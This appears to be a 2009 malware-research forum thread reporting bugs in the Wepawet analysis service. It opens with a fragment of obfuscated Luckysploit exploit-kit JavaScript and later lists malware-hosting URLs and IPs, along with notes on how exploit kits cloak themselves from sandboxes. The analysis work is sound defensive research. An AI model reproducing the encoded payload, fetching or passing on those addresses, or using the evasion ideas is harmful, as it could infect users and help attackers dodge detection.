QY+GNT+ZTX+GIP+WWF+QVK+OKR+QJQ+YOM+CGS+YQQ+XFQ+CUC+PLG+UXR+GHY+VLI+QBY+QOR+SIH+DIL+TQV+OMY+TWW+IFL+FJL+XDJ+LQK+YUF+LBG+MFR+BOT+SEG+NQS+TBB+RKQ+EVH+VMN+QEM+SGZ+JGH+WZH+BHT+QJH+BZV+QYU+RZH+JMI+JHM+ISQ+JZG+FSL+SGM+FHP+PJF+RLH+TZF+IEX+IPV+ICY+HGE+MZY+JDV+OCN+BSY+VVT+LPQ+QPI+VMY+MXI+ZET+GHU+YSP+OIY+WOS+EZK+MJG+GOS+RLS+SMD+FRL+ZKS+YKK+KTB+DGT+ULN+WGI+RLG+DRO+BGY+PJB+DBV+HON+YBM+GUJ+FOS+FHK+MJE+RFC+FWX+KLN+LYE+TNO+BGG+NQM+YPB+YXH+HSX+DVT+OGH+HNS+ZIY+HOY+IBG+XNR+GOU+KNC+TJK+WDM+LLU+YTO+UUM+IDW+QRV+FXY+HJW+LJZ+TUN+OCX+VKZ+NWQ+NME+KCP+KLT+UTQ+ODG+FDK+NKE+GUD+GGL+HZG+KZL+SCS+FXI+BRJ+BMM+GPB+ULC+KHS+GEY+GQF+NMS+ECB+NML+BLG+WHX+OQZ+UYS+PXK+JDP+EQR+CCK+NPY+WVP+MPF+NWG+UPE+RTP+JGL+IVO+LMF+IUR+JVZ+SGX+UBP+UEH+KSO+YOS+VMW+USP+KUN+POL+JPI+ZBZ+OBE+OVR+IOY+QIG+XUX+DNG+MGN+TOH+CCX+KLK+QYE+GJS+DQC+DHS+NGQ+TWM+YJH+TRT+PWQ+GJY+YZN+GGP+LGZ+CMY+UFJ+VDY+ZPG+XEN+DZX+FNC+SCT+NRU+WEV+GUE+JJJ+NVE+VCY+OBO+CIB+ZVW+YSO+MRJ+BSC+NFD+HBI+CWC+ECS+XPY+HNB+EJN+BPR+BUE+VZW+EXR+VGF+MRR+VZS+ZHR+BLK+FNV+NRY+OQX+VCB+TRM+RFP+LHF+ROL+CHV+XUF+KDV+FVO+NZN+FDU+JYZ+MLW+RRC+MHB+JVD+RQM+QYI+CCJ+BJL+UHB+YDB+JBI+VKG+ZRQ+QXJ+ZSD+BON+VNH+QHF+HMR+WXP+PFL+DTX+MBC+PPI+DOF+UJR+VJE+HSN+XXC+RYD+ZFQ+TXY+LDO+MGH+PLZ+EMR+KSC+REF+IUF+RDX+GLJ+RQY+BXB+KRG+JHV+LZR+UVT+YQO+CXV+NTY+RYS+QXV+FQZ+QQH+MBV+RKO+HJM+DKH+JYU+WQY+GXP+OWG+XCK+MYI+HUM+ETD+SWL+MJP+HFO+CUV+WFO+DWB+QNS+HUH+RRO+BEV+JKD+EXK+DYI+UJP+WIF+DLC+DPX+TSL+DNM+LWH+UPU+XKZ+REW+OXN+NLT+DEI+RUM+QSQ+HKY+LBU+PSS+FDX+GCS+SMW+DPL+WUL+OJZ+KTE+LWE+YCB+DTP+GMP+CBU+VGY+YRM+DIB+LFN+ZTM+CNP+KKB+TPH+NYO+CVK+CMO+QCN+VYE+MTR+ESF+HMY+KME+ING+YUW+RII+UBE+FWV+DHZ+RLZ+SNI+MDY+XIE+QLC+MGZ+CUR+CRB+DBU+ODX+FVZ+EER+OSD+XCR+WJD+ZEQ+ELW+OUR+PJE+BDN+GLI+BKN+HFZ+WSQ+NKH+VPG+YJB+LOI+YQZ+ZNM+RLI+EYZ+IHR+VWN+GOT+CBH+QHB+TMW+WFX+DXQ+EHN+EZT+NMZ+MHP+NPS+XTN+WKO+OVT+YSH+GSH+FNK+BZZ+BPV+JJV+TKL+GEU+WBM+TTX+HHG+HGM+UIF+RBJ+LTR+XMU+MHV+ZSE+GPY+NYT+IFP+UML+FXV+DVS+CSP+YFN+OUF+SXW+DLZ+XKM+IID+DVR+NHS+LFX+YCZ+ZVQ+HQY+ZLG+SIS+DJZ+QSC+WZZ+BTD+ZSB+SLI+EQS+SCY+RQL+NKQ+MPV+IXP+PPL+BTH+JZD+BCK+SVJ+GZP+OKE+HSE+IPE+ILM+LPR+RCD+WMO+MDT+UPB+WPU+WGQ+RFF+WGF+DQT+DWX+JUY+JZT+POK+UZY+FDN+IRG+KVN+FIL+QLB+ZPF+JFJ+JMH+UYP+HOU+JID+POV+YVC+LHJ+LSO+FUF+TTE+IXQ+FTF+HZZ+UBF+HNZ+GNN+IRJ+LNB+KQJ+JNK+MJW+KBM+OMJ+YVF+MOI+BIO+YXZ+KJX+SUD+UPS+BBD+VIG+VNE+URG+OGB;OJOVLR(VYGLDW);</script></html>

Wepawet is returning "Invalid hostname." and Malzilla can't seem to decode it ........

mercutio · May 07, 2009, 01:04:43 am

MysteryFCM,

The script you posted is decoded here:
http://wepawet.cs.ucsb.edu/view.php?hash=15db7e6dd281669c3f571942c75b3fcb&type=js
Luckysploit...

Regarding flash, I'll inquire with the "flash guy". I know that some work is under way, but I guess it will take time.

MysteryFCM · May 07, 2009, 01:26:39 am

Cheers

extrexploit · May 09, 2009, 02:29:18 pm

Hi guys,
Wepawet has a disclosure problem IMHO.
When an exploiter try to identify the configuration host probing activex version, browser version, plug in version and so on wepawet set this value in the same mode. This can useful for a botadmin because the response sent to exploiter support web site, it may be used for understand how react to attempts for automatic analysis. For example, if a common php stage of a malware spreading site recognize that the variables used by exploiter are valued with a schematic mode it can provide a fake page and made wrong result in terms of analysis . This only my point of view.
Feedback are welcome.
I have posted something about on my blog http://extraexploit.blogspot.com

Regards

SysAdMini · May 10, 2009, 06:12:46 pm

No detection

http://wepawet.cs.ucsb.edu/view.php?hash=b88d77827a836583e96f6e1e7fb6f454&t=1241979253&type=js

MysteryFCM · May 10, 2009, 08:16:48 pm

Say's it's benign but it infact, leads to a rogue;

http://wepawet.cs.ucsb.edu/view.php?hash=33f1ae9d7aaed00e905ac023cc06f39b&t=1241986710&type=js

Ref:
http://www.malwaredomainlist.com/forums/index.php?topic=2851.0

CkreM · May 11, 2009, 03:31:32 am

blank page:

http://wepawet.cs.ucsb.edu/view.php?hash=919fba4fa36b9a31919dc85c9fdce85e&t=1242012527&type=js

mercutio · May 12, 2009, 02:02:56 am

SysAdMini: from here 91.207.61.32/.r/.fi/index.php returns 404 and a benign error message.
The site is of course rather bad: http://wepawet.cs.ucsb.edu/domain.php?hash=6dbd5991176c36df9c0c505c04beba7e&type=js

MysteryFCM: I think the redirection will not be triggered unless the referer is "correct". Unfortunately, wepawet visits the page with an empty referer.

CkreM: yes, I really need to fix that. For now, I've just regenerated the report manually. Real fix coming in the next days, hopefully.

MysteryFCM · May 12, 2009, 01:32:40 pm

Depending on the method you're using, you should be able to set the referer? (or have an option to use one?)

SysAdMini · May 12, 2009, 03:32:18 pm

Wepawet is unable to analyze the pdf file at

Code: [Select]

hugetopnano.cn:8080/cache/readme.pdf
Not only the url fails. If I upload the pdf file then it fails too.

B_H · May 12, 2009, 06:29:03 pm

why wepawet can not analyze url with user pass ? for illegal policy ?! i have seen some url include user pass and hosted malware .

MysteryFCM · May 12, 2009, 07:36:08 pm

Wepawet is failing to analyse the URL's involved in the following;

http://hphosts.blogspot.com/2009/05/federal-reserve-goes-luckysploit.html

michajp posted some of the URL's to;

http://www.malwaredomainlist.com/forums/index.php?topic=2550.msg9710#msg9710

mercutio · May 12, 2009, 08:58:57 pm

SysAdMini: yeah, bug. Fixed:
http://wepawet.cs.ucsb.edu/view.php?hash=07ae80f2efd19ef8c6b5b0570cf4ab06&t=1242162153&type=js

B_H: yes, no https, no user/pass. If that becomes too much of a problem, it can be changed.

MysteryFCM · May 15, 2009, 11:06:03 am

Says invalid hostname;

time-for-mumpreneurs.site90.net\images\index.php

It's IP is actually: 64.235.47.65 (srv19.000webhost.com)

http://hosts-file.net/?s=time-for-mumpreneurs.site90.net

Author Topic: Wepawet issues (Read 26343 times)

MysteryFCM

Re: Wepawet issues

MysteryFCM

Re: Wepawet issues

mercutio

Re: Wepawet issues

MysteryFCM

Re: Wepawet issues

extrexploit

Re: Wepawet issues

SysAdMini

Re: Wepawet issues

MysteryFCM

Re: Wepawet issues

CkreM

Re: Wepawet issues

mercutio

Re: Wepawet issues

MysteryFCM

Re: Wepawet issues

SysAdMini

Re: Wepawet issues

B_H

Re: Wepawet issues

MysteryFCM

Re: Wepawet issues

mercutio

Re: Wepawet issues

MysteryFCM

Re: Wepawet issues